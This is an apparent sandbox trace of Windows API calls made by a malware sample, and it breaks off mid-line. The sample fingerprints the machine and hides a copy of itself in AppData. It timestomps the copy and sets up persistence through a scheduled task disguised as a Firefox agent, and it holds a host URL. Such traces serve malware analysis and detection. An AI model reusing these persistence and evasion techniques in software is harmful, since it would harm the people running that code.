returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" [0134.846] RtlGetVersion (in: lpVersionInformation=0x550457 | out: lpVersionInformation=0x550457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0134.847] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0xfeefdc8 | out: TokenHandle=0xfeefdc8*=0x2174) returned 1 [0134.847] GetTokenInformation (in: TokenHandle=0x2174, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfeefdc0 | out: TokenInformation=0x0, ReturnLength=0xfeefdc0) returned 0 [0134.847] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x25) returned 0x8000830 [0134.847] GetTokenInformation (in: TokenHandle=0x2174, TokenInformationClass=0x19, TokenInformation=0x8000830, TokenInformationLength=0x1c, ReturnLength=0xfeefdc0 | out: TokenInformation=0x8000830, ReturnLength=0xfeefdc0) returned 1 [0134.847] GetSidSubAuthorityCount (pSid=0x8000840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x8000841 [0134.847] GetSidSubAuthority (pSid=0x8000840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x8000848 [0134.847] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x25 [0134.848] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0134.848] CloseHandle (hObject=0x2174) returned 1 [0134.848] GetComputerNameA (in: lpBuffer=0xfeefe90, nSize=0xfeefed0 | out: lpBuffer="XC64ZB", nSize=0xfeefed0) returned 1 [0134.848] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0xfeefec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xfeefec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.849] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x29) returned 0x8000830 [0134.849] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x14) returned 0x8000870 [0134.849] wsprintfA (in: param_1=0x8000830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0134.857] CryptAcquireContextA (in: phProv=0xfeefe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xfeefe18*=0x44d4900) returned 1 [0134.905] CryptCreateHash (in: hProv=0x44d4900, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xfeefe10 | out: phHash=0xfeefe10) returned 1 [0134.907] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0134.907] CryptHashData (hHash=0xa312800, pbData=0x8000830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0134.907] CryptGetHashParam (in: hHash=0xa312800, dwParam=0x2, pbData=0xfeefe20, pdwDataLen=0xfeefe50, dwFlags=0x0 | out: pbData=0xfeefe20, pdwDataLen=0xfeefe50) returned 1 [0134.907] wsprintfA (in: param_1=0x55020c, param_2="%02X" | out: param_1="FE") returned 2 [0134.907] wsprintfA (in: param_1=0x55020e, param_2="%02X" | out: param_1="7F") returned 2 [0134.907] wsprintfA (in: param_1=0x550210, param_2="%02X" | out: param_1="15") returned 2 [0134.907] wsprintfA (in: param_1=0x550212, param_2="%02X" | out: param_1="06") returned 2 [0134.907] wsprintfA (in: param_1=0x550214, param_2="%02X" | out: param_1="0B") returned 2 [0134.907] wsprintfA (in: param_1=0x550216, param_2="%02X" | out: param_1="87") returned 2 [0134.907] wsprintfA (in: param_1=0x550218, param_2="%02X" | out: param_1="5F") returned 2 [0134.907] wsprintfA (in: param_1=0x55021a, param_2="%02X" | out: param_1="B9") returned 2 [0134.907] wsprintfA (in: param_1=0x55021c, param_2="%02X" | out: param_1="FB") returned 2 [0134.907] wsprintfA (in: param_1=0x55021e, param_2="%02X" | out: param_1="2A") returned 2 [0134.907] wsprintfA (in: param_1=0x550220, param_2="%02X" | out: param_1="49") returned 2 [0134.908] wsprintfA (in: param_1=0x550222, param_2="%02X" | out: param_1="F0") returned 2 [0134.908] wsprintfA (in: param_1=0x550224, param_2="%02X" | out: param_1="8D") returned 2 [0134.908] wsprintfA (in: param_1=0x550226, param_2="%02X" | out: param_1="5D") returned 2 [0134.908] wsprintfA (in: param_1=0x550228, param_2="%02X" | out: param_1="03") returned 2 [0134.908] wsprintfA (in: param_1=0x55022a, param_2="%02X" | out: param_1="12") returned 2 [0134.908] CryptDestroyHash (hHash=0xa312800) returned 1 [0134.908] CryptReleaseContext (hProv=0x44d4900, dwFlags=0x0) returned 1 [0134.908] wsprintfA (in: param_1=0x55022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0134.908] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000870) returned 0x14 [0134.908] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000870) returned 1 [0134.908] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x29 [0134.908] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0134.908] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0xe) returned 0x8000830 [0134.909] wsprintfA (in: param_1=0x550dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0134.909] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0xe [0134.909] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0134.909] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x2174 [0134.909] RtlGetLastWin32Error () returned 0x0 [0134.909] GetTickCount () returned 0x10f2c59 [0134.909] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x1008) returned 0x8000830 [0134.909] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x2e) returned 0x8001840 [0134.909] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xfeefed8 | out: phkResult=0xfeefed8*=0x1758) returned 0x0 [0134.909] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x14) returned 0x8001880 [0134.909] RegQueryValueExA (in: hKey=0x1758, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0xfeefe60, lpcbData=0xfeefec0*=0x20 | out: lpType=0x0, lpData=0xfeefe60*=0x31, lpcbData=0xfeefec0*=0xd) returned 0x0 [0134.909] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001880) returned 0x14 [0134.909] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001880) returned 1 [0134.909] lstrlenA (lpString="11.0.10586.0") returned 12 [0134.909] lstrlenA (lpString=".") returned 1 [0134.909] atoi (_Str="11") returned 11 [0134.909] RegCloseKey (hKey=0x1758) returned 0x0 [0134.910] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x2e [0134.910] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0134.910] ObtainUserAgentString (in: dwOption=0xb, pszUAOut=0x8000830, cbSize=0xfeefec0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xfeefec0) returned 0x0 [0134.970] lstrlenA (lpString="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 74 [0134.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8000830, cbMultiByte=75, lpWideCharStr=0x550577, cchWideChar=150 | out: lpWideCharStr="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 75 [0134.970] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8000830) returned 0x1008 [0134.971] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8000830) returned 1 [0134.971] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x1008) returned 0x8000830 [0134.971] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x1c) returned 0x8001840 [0134.971] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x8000830, nSize=0x105 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0134.971] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x1c [0134.971] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0134.971] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x16) returned 0x8001840 [0134.972] wsprintfW (in: param_1=0x5507a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0134.972] wsprintfW (in: param_1=0x550bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa") returned 45 [0134.972] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x16 [0134.972] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0134.972] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x24) returned 0x8001840 [0134.972] lstrlenA (lpString="http://host-host-file8.com/") returned 27 [0134.972] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x8001840, Length=0x1b) returned 0x1c0d8e43 [0134.972] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x24 [0134.973] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0134.973] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 1 [0134.973] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0 [0134.973] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), bFailIfExists=0) returned 1 [0135.878] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe")) returned 1 [0135.897] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001840 [0135.897] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x2a) returned 0x8001860 [0135.897] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x408) returned 0x80018a0 [0135.897] wsprintfW (in: param_1=0x80018a0, param_2="%s%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier") returned 61 [0135.897] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih:zone.identifier")) returned 0 [0135.897] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x80018a0) returned 0x408 [0135.897] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80018a0) returned 1 [0135.897] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x12 [0135.897] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0135.897] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001860) returned 0x2a [0135.898] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001860) returned 1 [0135.898] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x16) returned 0x8001840 [0135.898] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x210) returned 0x8001860 [0135.898] GetSystemDirectoryA (in: lpBuffer=0x8001860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0135.898] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0135.898] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0135.898] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwFileAttributes=0x6) returned 1 [0135.899] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x20cc [0135.899] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0xfeefe30 | out: lpFileInformation=0xfeefe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3ef0)) returned 1 [0135.899] SetFileTime (hFile=0x20cc, lpCreationTime=0xfeefe34, lpLastAccessTime=0xfeefe3c, lpLastWriteTime=0xfeefe44) returned 1 [0135.899] CloseHandle (hObject=0x20cc) returned 1 [0135.899] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001860) returned 0x210 [0135.899] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001860) returned 1 [0135.899] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x16 [0135.899] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0135.899] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x418) returned 0x8001840 [0135.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0135.900] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x212) returned 0x8001c60 [0135.900] GetUserNameW (in: lpBuffer=0x8001c60, pcbBuffer=0xfeefe70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0xfeefe70) returned 1 [0135.906] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10d) returned 0x8001e80 [0135.906] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x4c) returned 0x8001fa0 [0135.907] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10d) returned 0x8002000 [0135.907] wsprintfW (in: param_1=0x8001e80, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent FE7F15060B875FB9") returned 46 [0135.907] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8002000) returned 0x10d [0135.907] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8002000) returned 1 [0135.907] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001fa0) returned 0x4c [0135.908] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001fa0) returned 1 [0135.908] CoCreateInstance (in: rclsid=0x561010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x561000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xfeefd08 | out: ppv=0xfeefd08*=0x3936650) returned 0x0 [0136.349] TaskScheduler:ITaskService:Connect (This=0x3936650, serverName=0xfeefd80*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6), user=0xfeefda0*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6), domain=0xfeefd60*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6), password=0xfeefde0*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6)) returned 0x0 [0136.453] TaskScheduler:ITaskService:GetFolder (in: This=0x3936650, Path="", ppFolder=0xfeefd28 | out: ppFolder=0xfeefd28*=0x39b9480) returned 0x0 [0136.455] ITaskFolder:DeleteTask (This=0x39b9480, Name="Firefox Default Browser Agent FE7F15060B875FB9", flags=0) returned 0x80070002 [0136.456] TaskScheduler:ITaskService:NewTask (in: This=0x3936650, flags=0x0, ppDefinition=0xfeefe40 | out: ppDefinition=0xfeefe40*=0x3973c30) returned 0x0 [0136.457] ITaskDefinition:get_RegistrationInfo (in: This=0x3973c30, ppRegistrationInfo=0xfeefd40 | out: ppRegistrationInfo=0xfeefd40*=0x39618d0) returned 0x0 [0136.457] IRegistrationInfo:put_Author (This=0x39618d0, Author="RDhJ0CNFevzX") returned 0x0 [0136.457] IUnknown:Release (This=0x39618d0) returned 0x1 [0136.457] ITaskDefinition:get_Settings (in: This=0x3973c30, ppSettings=0xfeefd18 | out: ppSettings=0xfeefd18*=0x3961a50) returned 0x0 [0136.458] ITaskSettings:put_StartWhenAvailable (This=0x3961a50, StartWhenAvailable=1) returned 0x0 [0136.458] IUnknown:Release (This=0x3961a50) returned 0x3 [0136.458] ITaskDefinition:get_Triggers (in: This=0x3973c30, ppTriggers=0xfeefd20 | out: ppTriggers=0xfeefd20*=0x39759f0) returned 0x0 [0136.458] ITriggerCollection:Create (in: This=0x39759f0, Type=1, ppTrigger=0xfeefe30 | out: ppTrigger=0xfeefe30*=0x3973cc0) returned 0x0 [0136.458] IUnknown:QueryInterface (in: This=0x3973cc0, riid=0x561030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0xfeefd10 | out: ppvObject=0xfeefd10*=0x3973cc0) returned 0x0 [0136.458] ITrigger:get_Repetition (in: This=0x3973cc0, ppRepeat=0xfeefd00 | out: ppRepeat=0xfeefd00*=0x39c5430) returned 0x0 [0136.459] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x14) returned 0x8001fa0 [0136.459] IRepetitionPattern:put_Interval (This=0x39c5430, Interval="PT10M") returned 0x0 [0136.459] ITrigger:put_Repetition (This=0x3973cc0, Repetition=0x39c5430) returned 0x0 [0136.459] IUnknown:Release (This=0x39c5430) returned 0x1 [0136.459] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x30) returned 0x8001fc0 [0136.459] ITrigger:put_StartBoundary (This=0x3973cc0, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0136.459] IUnknown:Release (This=0x3973cc0) returned 0x2 [0136.459] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001fc0) returned 0x30 [0136.460] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001fc0) returned 1 [0136.460] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001fa0) returned 0x14 [0136.460] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001fa0) returned 1 [0136.460] IUnknown:Release (This=0x3973cc0) returned 0x1 [0136.460] ITriggerCollection:Create (in: This=0x39759f0, Type=9, ppTrigger=0xfeefe30 | out: ppTrigger=0xfeefe30*=0x39416a0) returned 0x0 [0136.461] IUnknown:QueryInterface (in: This=0x39416a0, riid=0x561020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0xfeefd00 | out: ppvObject=0xfeefd00*=0x39416a0) returned 0x0 [0136.461] ILogonTrigger:put_UserId (This=0x39416a0, UserId="RDhJ0CNFevzX") returned 0x0 [0136.468] IUnknown:Release (This=0x39416a0) returned 0x2 [0136.468] IUnknown:Release (This=0x39416a0) returned 0x1 [0136.468] ITaskDefinition:get_Actions (in: This=0x3973c30, ppActions=0xfeefd30 | out: ppActions=0xfeefd30*=0x39b9800) returned 0x0 [0136.469] IActionCollection:Create (in: This=0x39b9800, Type=0, ppAction=0xfeefd48 | out: ppAction=0xfeefd48*=0x39760f0) returned 0x0 [0136.469] IUnknown:Release (This=0x39b9800) returned 0x1 [0136.469] IUnknown:QueryInterface (in: This=0x39760f0, riid=0x561040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0xfeefd38 | out: ppvObject=0xfeefd38*=0x39760f0) returned 0x0 [0136.469] IExecAction:put_Path (This=0x39760f0, Path="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 0x0 [0136.469] IUnknown:Release (This=0x39760f0) returned 0x2 [0136.469] ITaskFolder:RegisterTaskDefinition (in: This=0x39b9480, Path="Firefox Default Browser Agent FE7F15060B875FB9", pDefinition=0x3973c30, flags=6, UserId=0xfeefd60*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6), password=0xfeefda0*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6), LogonType=3, sddl=0xfeefd80*(varType=0x0, wReserved1=0x800, wReserved2=0x0, wReserved3=0x0, varVal1=0x565257, varVal2=0x5507a6), ppTask=0xfeefd00 | out: ppTask=0xfeefd00*=0x3960e50) returned 0x0 [0137.531] IUnknown:Release (This=0x39760f0) returned 0x1 [0137.531] IUnknown:Release (This=0x39759f0) returned 0x1 [0137.531] TaskScheduler:IUnknown:Release (This=0x3973c30) returned 0x0 [0137.531] TaskScheduler:IUnknown:Release (This=0x39b9480) returned 0x0 [0137.531] TaskScheduler:IUnknown:Release (This=0x3936650) returned 0x0 [0137.531] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001e80) returned 0x10d [0137.532] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001e80) returned 1 [0137.532] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x418 [0137.532] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0137.532] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001c60) returned 0x212 [0137.533] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001c60) returned 1 [0137.533] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x217c [0137.533] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 0x2184 [0137.533] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x24) returned 0x8001840 [0137.533] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd35f65e1 [0137.534] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x61) returned 0x8001870 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3096f5c5 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xce09315 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x25df5078 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf62eade8 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x57e90409 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x16009c9e [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2daf3e97 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb0c285de [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7a0e5a61 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4322e828 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x58025146 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd0952fbe [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa485e8e4 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7bb0821e [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3bf22368 [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x2fe79f9a [0137.534] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf6c7210b [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3063b20a [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3b9f7d00 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd7f86e93 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x98c2eddf [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd8a7aa70 [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd392be7d [0137.535] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 